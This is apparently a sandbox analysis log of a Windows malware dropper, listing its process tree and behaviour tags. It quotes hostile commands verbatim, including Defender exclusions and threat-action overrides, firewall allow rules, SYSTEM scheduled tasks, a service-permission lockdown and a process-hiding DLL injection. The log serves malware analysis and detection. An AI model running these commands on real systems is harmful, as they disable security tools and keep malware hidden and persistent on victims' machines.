PID 3888 wrote to memory of 2088	3888	OYYF9HTQ5SJVtUftEvg2Vczg.exe	Install.exe
PID 1016 wrote to memory of 1116	1016	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 1016 wrote to memory of 1116	1016	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 1016 wrote to memory of 1116	1016	3BVFDXkt09D3q0LgQVE6DprB.exe	3BVFDXkt09D3q0LgQVE6DprB.exe
PID 2088 wrote to memory of 1508	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 1508	2088	Install.exe	forfiles.exe
PID 2088 wrote to memory of 1508	2088	Install.exe	forfiles.exe
PID 1508 wrote to memory of 1892	1508	forfiles.exe	schtasks.exe
PID 1508 wrote to memory of 1892	1508	forfiles.exe	schtasks.exe
PID 1508 wrote to memory of 1892	1508	forfiles.exe	schtasks.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4284

C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
"C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3076

C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
"C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe"
4⤵
- Executes dropped EXE
PID:3400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1128
5⤵
- Program crash
PID:1404

C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe
"C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1424

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1652
4⤵
- Program crash
PID:3716

C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
"C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:736

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:3124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:2172

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:1892

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:4936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3468

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:4820

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
6⤵
- Executes dropped EXE
PID:1072

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
7⤵
PID:228

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:244

C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe
"C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:2112

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:3244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4656

C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
"C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe"
3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4544

C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
"C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3888

C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
.\Install.exe /nxdidQZJ "385118" /S
4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2088

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:1892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1288

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe\" em /OQsite_idAGR 385118 /S" /V1 /F
5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1272

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --silent --allusers=0
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:724

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6f17e1d0,0x6f17e1dc,0x6f17e1e8
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2584

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe" --version
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1100

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=724 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140452" --session-guid=70a790ff-7af7-4039-a4c9-a3be2700ab7a --server-tracking-blob="NTU2OWNkYmVmNDljZjA1NzFhNjFjZjIyYTUxMzVlYTQzNzNjYTQ3NzAwNTlhODZjZWI2NGM0YTg4NDdkZmMyNzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTM1NDgxLjYxMzkiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiMmFhMmY4YjctMTViNS00YWYxLTljOWItNTZkMTEyNjJlZTBlIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=2804000000000000
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1016

C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2bc,0x2c0,0x2c4,0x28c,0x2c8,0x6e02e1d0,0x6e02e1dc,0x6e02e1e8
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1116

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
4⤵
- Executes dropped EXE
PID:4844

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --version
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1524

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0xd86038,0xd86044,0xd86050
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1272

C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe
"C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4564

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
4⤵
- Executes dropped EXE
PID:1412

C:\Windows\SYSTEM32\msiexec.exe
"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
5⤵
PID:4196

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
2⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3400 -ip 3400
1⤵
PID:2188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 3076 -ip 3076
1⤵
PID:4020

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1460

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe em /OQsite_idAGR 385118 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1748

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:2204

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:3056

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:2288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4044

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:4324

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:5008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:3764

C:\Windows\SysWOW64\reg.exe
